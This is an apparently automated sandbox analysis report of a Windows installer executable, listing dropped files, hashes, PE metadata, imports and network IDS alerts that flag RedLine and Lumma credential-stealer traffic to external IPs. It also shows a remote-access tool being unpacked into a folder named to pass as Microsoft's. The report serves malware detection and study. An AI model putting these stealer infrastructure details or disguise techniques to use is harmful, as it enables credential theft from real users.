                                                                                                                                                                                                                                                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:"https://r.bing.com/rs/79/fR/jnc,nj/tlifxqsNyCzxIJnRwtQKuZToQQw.js?or=w"
                                                                                                                                                                                                                                                                        Preview:0
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1410
                                                                                                                                                                                                                                                                        Entropy (8bit):4.770304768304694
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7kPInmFWkglLh6an1r/zoxz2UwzB6NCgzAo0l8z0gtcodb:DQpkAVBx/iavzB6NZAo0l8zltck
                                                                                                                                                                                                                                                                        MD5:936CA8F6DF41F841CAAE5362CC94FA29
                                                                                                                                                                                                                                                                        SHA1:6406FB60A3693E481AFB3394588A5F14320C167F
                                                                                                                                                                                                                                                                        SHA-256:EED3E25F9E4237A3AAFE7BC3536702FBDEB6B14073063300C4F61784175AC300
                                                                                                                                                                                                                                                                        SHA-512:CD3AFE4229C100BCB27B21868DE8092C88A5FB2DAEC68A4883158581B138D92701F4403B345E6E4F1E248B38BE9F810BA7F71ADC5F5153A68E3D9774891B21EC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXL7Uv.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx...]H.Q.....VNg..E.R0.(..,.G.AaH...i]t.x.M7...W.)..iV..........0.Aa.YA.}.J.M.:........9.w...<.O.....y.........r.P.[k......o..;:...9u...|..\....Z.......l.&..........2N3.......K.u.....V>........'.W......D..J...1..b..R.F.C.x..E...'`1..RP.......$cW.>.....U.....0DD..'...AfV6Y....<mo.+.. ..t...;-.4............2q.......=b........Ett.4@..|$..-..<.q.>8.w...].F.U^NY.MPkX.......... .^(q?..(....e.../..h.0.L.........0../Pq...@-.3...^'*....-..../.x'<..$......$...`kj.....@...F.T.'|..|..3!...V........0...7.P... .R.U..JI....e!.7.e.G..F....I..7.h.5)cV.v.......K"....'..m.*...8!..$Iy.....X.HO.h4....?.<f...=......E..O......#..U....IEND.B`........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:38:22], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5387
                                                                                                                                                                                                                                                                        Entropy (8bit):7.799957991588148
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:sQ+bfdSpU7SG7bVFwZ1w2f7yXMAZpqdiCRf6LtoIJ7g0WRiKQS+FhIeEIboU3cq:sRdSpU7vbVFwZ11jIIO6M7JqoIZuz3cq
                                                                                                                                                                                                                                                                        MD5:69D162774F894FF8B920330E376B7A62
                                                                                                                                                                                                                                                                        SHA1:F79CF9C0CCB851C7DB4924A54B0EFCD2F4398CA0
                                                                                                                                                                                                                                                                        SHA-256:C9FAA34663FE19EB4D8C007BF00AD7C4BC993F70C9FC42A04801ECCDD59008F7
                                                                                                                                                                                                                                                                        SHA-512:9D0E7FA4AC408D9D7D86186E05258BDB615B04AE8EC0DF813C3307A646EC4F87AABA1FCD77914AEA1FFE3607B87BBCA2DCC5D18C076D8AECDEA1496910AEC87D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:38:22....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.......................................................................................S&....1...\.g).l.....^S......^,I..c.7,..YX(."..>wiT.y.:^8........R*.-)s..>.+@..c..V.[Af...T.........3........B.|.~...A..|..r.......(qC..m~..nb...r.LIU.i3.K..........y.]5..\W;b.:/F...v.OW.R^...y^}4._...I4.t....l......,.$.C.....6..IS..E...../..J...5...%....Z.eK.u....j.........*x.{..t.!....@,...}..W...X8.S.........X.Z...-.w..(.8...z..EC..\....8.m5...z....Y.!\...!@.<:b].-.i}.....?..%...=gE.VM..\.2CJ..kK.d...o.!..v...M.e..4,...l...Y0...V.[.g..r.....h.....[-..-.....J....9kA..L...#.!"."kO.;...R.2...)Mr...X8....G.;A..".!az..Ud.Ie......+..........................!34 "12..$0ABCD........
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, CR, LF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1417
                                                                                                                                                                                                                                                                        Entropy (8bit):5.038888575659195
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:zKcNDYToY5eqruuL6JL2QV8wkutu/2PJ74uzQD0DYJQb:zKaDYcY5eqquL6JKQV8wnQ/2PVjUQJ
                                                                                                                                                                                                                                                                        MD5:300006A7F17F1480B89F012C3714F231
                                                                                                                                                                                                                                                                        SHA1:D7087957485225AC31687EB3C6B3004BF905D351
                                                                                                                                                                                                                                                                        SHA-256:7CFB579E01245B482D4929B4FBD5408CDEBA8446DB61CA16FF985D771D3989A8
                                                                                                                                                                                                                                                                        SHA-512:7ADD4D7A264ED6F04238A39AEC99EF3DBED77B0AE1E72FAB7B8C829A2EE3993D1C6526552D42135EFE1686ACB14CE9CA82EF8B72BB4DAC0C0E9F17A15044BBE8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:Microsoft (R) File Expansion Utility..Copyright (c) Microsoft Corporation. All rights reserved.....Adding C:\ProgramData\regid.1993-06.com.microsoft\atmfd.dll to Extraction Queue..Adding C:\ProgramData\regid.1993-06.com.microsoft\client32.ini to Extraction Queue..Adding C:\ProgramData\regid.1993-06.com.microsoft\client32u.ini to Extraction Queue..Adding C:\ProgramData\regid.1993-06.com.microsoft\HTCTL32.DLL to Extraction Queue..Adding C:\ProgramData\regid.1993-06.com.microsoft\msvcr100.dll to Extraction Queue..Adding C:\ProgramData\regid.1993-06.com.microsoft\nskbfltr.inf to Extraction Queue..Adding C:\ProgramData\regid.1993-06.com.microsoft\NSM.ini to Extraction Queue..Adding C:\ProgramData\regid.1993-06.com.microsoft\NSM.LIC to Extraction Queue..Adding C:\ProgramData\regid.1993-06.com.microsoft\nsm_vpro.ini to Extraction Queue..Adding C:\ProgramData\regid.1993-06.com.microsoft\pcicapi.dll to Extraction Queue..Adding C:\ProgramData\regid.1993-06.com.microsoft\PCICHEK.DLL to Extraction
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                                                                        Entropy (8bit):3.6388132069840315
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:2lc5I2Y1AnVrmlLn:CtG5SLn
                                                                                                                                                                                                                                                                        MD5:56575A4D9537648BAFB1D8000B73AB2C
                                                                                                                                                                                                                                                                        SHA1:01895D8807EEBC74D91E43F43429210DE6D69592
                                                                                                                                                                                                                                                                        SHA-256:7A8E1677D10C0978EA216FDEA4259AB99DE74453B3B996A28A27C4FFE8B0590F
                                                                                                                                                                                                                                                                        SHA-512:B296BAF1A9986223F7DB97F5C32E9AE236D9FF5311A4CE0631D267064FC3EBF4AD0DAB4F92BB29ED0D22A32F4BEB2F4B9FC450CF501244F9A96F8C9564DB37E9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:....4.9.4.1.2.6.....\MAILSLOT\NET\GETDCA025472D.................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                                                                        Entropy (8bit):3.681858324205336
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:2lc5I2Y1Anr96lt8lLn:CtG56ELn
                                                                                                                                                                                                                                                                        MD5:4947743A25F00A967163218521599961
                                                                                                                                                                                                                                                                        SHA1:CB6F55238C27B5E4D5A935EA222C2565D7B02080
                                                                                                                                                                                                                                                                        SHA-256:3F2B0F9912FDD166CDD706BC17CA81ABA14EEBBA0F7D11E2339A42DE95840DA9
                                                                                                                                                                                                                                                                        SHA-512:6F0BC544826ED2D6724FF80F09ED07653CB3F7B78D96DD7083B710A8D46C2B22BABA43AC56C5785D6609DB9DCA837E956C727AA2C529CDC0B45C5B7004E16B36
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:....4.9.4.1.2.6.....\MAILSLOT\NET\GETDCABD4807B.................
                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):7.41474800570153
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 98.04%
                                                                                                                                                                                                                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                                                                                                                                                                                                                        • InstallShield setup (43055/19) 0.42%
                                                                                                                                                                                                                                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                                                                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                                                                                        File name:ZmWSzgevgt.exe
                                                                                                                                                                                                                                                                        File size:1'671'954 bytes
                                                                                                                                                                                                                                                                        MD5:2deaf2be4672bf6457e136d78a7a3940
                                                                                                                                                                                                                                                                        SHA1:f8460d05dbdb1c171818510c9685847d00468349
                                                                                                                                                                                                                                                                        SHA256:4f2d5d155fe7497f9ab429cae34c5ebbdd711b0256b3bae83d9038cf1526c724
                                                                                                                                                                                                                                                                        SHA512:d6ac5c64471ed17b2f372d29da6a17fb7a959c02f026ee05134b77a90361f4e15bd4f531424107407cd54ce985aa5aee7eeca72da064fde10f9c1ba638181a47
                                                                                                                                                                                                                                                                        SSDEEP:24576:s7FUDowAyrTVE3U5F/dszKic6QL3E2vVsjECUAQT45deRV9Rg:sBuZrEUiKIy029s4C1eH9e
                                                                                                                                                                                                                                                                        TLSH:5575BF3FF268A13EC5AA1B3245B38310997BBA51B81A8C1E47FC344DCF765601E3B656
                                                                                                                                                                                                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                                                                                                        Icon Hash:0c0c2d33ceec80aa
                                                                                                                                                                                                                                                                        Entrypoint:0x4b5eec
                                                                                                                                                                                                                                                                        Entrypoint Section:.itext
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x63ECF218 [Wed Feb 15 14:54:16 2023 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                                                                                        Import Hash:e569e6f445d32ba23766ad67d1e3787f
                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                                        add esp, FFFFFFA4h
                                                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-3Ch], eax
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-40h], eax
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-5Ch], eax
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-30h], eax
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-38h], eax
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-34h], eax
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-2Ch], eax
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-28h], eax
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-14h], eax
                                                                                                                                                                                                                                                                        mov eax, 004B14B8h
                                                                                                                                                                                                                                                                        call 00007F6AF0EADD25h
                                                                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                        push 004B65E2h
                                                                                                                                                                                                                                                                        push dword ptr fs:[eax]
                                                                                                                                                                                                                                                                        mov dword ptr fs:[eax], esp
                                                                                                                                                                                                                                                                        xor edx, edx
                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                        push 004B659Eh
                                                                                                                                                                                                                                                                        push dword ptr fs:[edx]
                                                                                                                                                                                                                                                                        mov dword ptr fs:[edx], esp
                                                                                                                                                                                                                                                                        mov eax, dword ptr [004BE634h]
                                                                                                                                                                                                                                                                        call 00007F6AF0F50817h
                                                                                                                                                                                                                                                                        call 00007F6AF0F5036Ah
                                                                                                                                                                                                                                                                        lea edx, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                                                                        call 00007F6AF0EC37C4h
                                                                                                                                                                                                                                                                        mov edx, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                                        mov eax, 004C1D84h
                                                                                                                                                                                                                                                                        call 00007F6AF0EA8917h
                                                                                                                                                                                                                                                                        push 00000002h
                                                                                                                                                                                                                                                                        push 00000000h
                                                                                                                                                                                                                                                                        push 00000001h
                                                                                                                                                                                                                                                                        mov ecx, dword ptr [004C1D84h]
                                                                                                                                                                                                                                                                        mov dl, 01h
                                                                                                                                                                                                                                                                        mov eax, dword ptr [004238ECh]
                                                                                                                                                                                                                                                                        call 00007F6AF0EC4947h
                                                                                                                                                                                                                                                                        mov dword ptr [004C1D88h], eax
                                                                                                                                                                                                                                                                        xor edx, edx
                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                        push 004B654Ah
                                                                                                                                                                                                                                                                        push dword ptr fs:[edx]
                                                                                                                                                                                                                                                                        mov dword ptr fs:[edx], esp
                                                                                                                                                                                                                                                                        call 00007F6AF0F5089Fh
                                                                                                                                                                                                                                                                        mov dword ptr [004C1D90h], eax
                                                                                                                                                                                                                                                                        mov eax, dword ptr [004C1D90h]
                                                                                                                                                                                                                                                                        cmp dword ptr [eax+0Ch], 01h
                                                                                                                                                                                                                                                                        jne 00007F6AF0F56ABAh
                                                                                                                                                                                                                                                                        mov eax, dword ptr [004C1D90h]
                                                                                                                                                                                                                                                                        mov edx, 00000028h
                                                                                                                                                                                                                                                                        call 00007F6AF0EC523Ch
                                                                                                                                                                                                                                                                        mov edx, dword ptr [004C1D90h]
                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0xc40000x9a.edata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc20000xfdc.idata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x11000.rsrc
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xc60000x18.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xc22f40x254.idata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xc30000x1a4.didata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                        .text0x10000xb39e40xb3a00False0.34525867693110646data6.357635049994181IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .itext0xb50000x16880x1800False0.54443359375data5.971425428435973IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .data0xb70000x37a40x3800False0.36097935267857145data5.048648594372454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .bss0xbb0000x6de80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .idata0xc20000xfdc0x1000False0.3798828125data5.029087481102678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .didata0xc30000x1a40x200False0.345703125data2.7509822285969876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .edata0xc40000x9a0x200False0.2578125data1.877162954504408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .tls0xc50000x180x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .rdata0xc60000x5d0x200False0.189453125data1.3838943752217987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .rsrc0xc70000x110000x11000False0.18623621323529413data3.69581702026596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                        RT_ICON0xc76780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                                                                                                                                                                                                                                                        RT_ICON0xc80e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                                                                                                                                                                                                                                                        RT_ICON0xc87480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                                                                                                                                                                                                                                                        RT_ICON0xc8a300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                                                                                                                                                                                                                                                        RT_ICON0xc8b580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                                                                                                                                                                                                                                                        RT_ICON0xca1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                                                                                                                                                                                                                                                        RT_ICON0xcb0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                                                                                                                                                                                                                                                        RT_ICON0xcb8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                                                                                                                                                                                                                                                        RT_ICON0xcbe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                                                                                                                                                                                                                                                        RT_ICON0xcd1200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                                                                                                                                                                                                                                                        RT_ICON0xd13480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                                                                                                                                                                                                                                                        RT_ICON0xd38f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                                                                                                                                                                                                                                                        RT_ICON0xd49980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                                                                                                                                                                                                                                                        RT_STRING0xd4e000x360data0.34375
                                                                                                                                                                                                                                                                        RT_STRING0xd51600x260data0.3256578947368421
                                                                                                                                                                                                                                                                        RT_STRING0xd53c00x45cdata0.4068100358422939
                                                                                                                                                                                                                                                                        RT_STRING0xd581c0x40cdata0.3754826254826255
                                                                                                                                                                                                                                                                        RT_STRING0xd5c280x2d4data0.39226519337016574
                                                                                                                                                                                                                                                                        RT_STRING0xd5efc0xb8data0.6467391304347826
                                                                                                                                                                                                                                                                        RT_STRING0xd5fb40x9cdata0.6410256410256411
                                                                                                                                                                                                                                                                        RT_STRING0xd60500x374data0.4230769230769231
                                                                                                                                                                                                                                                                        RT_STRING0xd63c40x398data0.3358695652173913
                                                                                                                                                                                                                                                                        RT_STRING0xd675c0x368data0.3795871559633027
                                                                                                                                                                                                                                                                        RT_STRING0xd6ac40x2a4data0.4275147928994083
                                                                                                                                                                                                                                                                        RT_RCDATA0xd6d680x10data1.5
                                                                                                                                                                                                                                                                        RT_RCDATA0xd6d780x2c4data0.6384180790960452
                                                                                                                                                                                                                                                                        RT_RCDATA0xd703c0x2cdata1.1363636363636365
                                                                                                                                                                                                                                                                        RT_GROUP_ICON0xd70680xbcdataEnglishUnited States0.6170212765957447
                                                                                                                                                                                                                                                                        RT_VERSION0xd71240x584dataEnglishUnited States0.2754957507082153
                                                                                                                                                                                                                                                                        RT_MANIFEST0xd76a80x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                        kernel32.dllGetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                                                                                                                                                                                                                        comctl32.dllInitCommonControls
                                                                                                                                                                                                                                                                        version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                                                                                                                                                                                        user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                                                                                                                                                                                                                        oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                                                                                                                                                                                                                        netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                                                                                                                                                                                                        advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, RegQueryValueExW, AdjustTokenPrivileges, GetTokenInformation, ConvertSidToStringSidW, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW
                                                                                                                                                                                                                                                                        NameOrdinalAddress
                                                                                                                                                                                                                                                                        TMethodImplementationIntercept30x4541a8
                                                                                                                                                                                                                                                                        __dbk_fcall_wrapper20x40d0a0
                                                                                                                                                                                                                                                                        dbkFCallWrapperAddr10x4be63c
                                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350296812046045 12/06/23-14:36:21.023223TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5029681192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350339812046045 12/06/23-14:36:51.222959TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5033981192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.5104.21.83.14550240802048094 12/06/23-14:35:36.356295TCP2048094ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration5024080192.168.2.5104.21.83.145
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350333812046045 12/06/23-14:36:47.245112TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5033381192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350342812046045 12/06/23-14:36:53.204282TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5034281192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.5104.21.83.14550196802855505 12/06/23-14:35:05.037520TCP2855505ETPRO TROJAN Lumma Stealer Related Activity5019680192.168.2.5104.21.83.145
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350281812046045 12/06/23-14:36:10.745594TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5028181192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350290812046045 12/06/23-14:36:17.057630TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5029081192.168.2.577.105.136.3
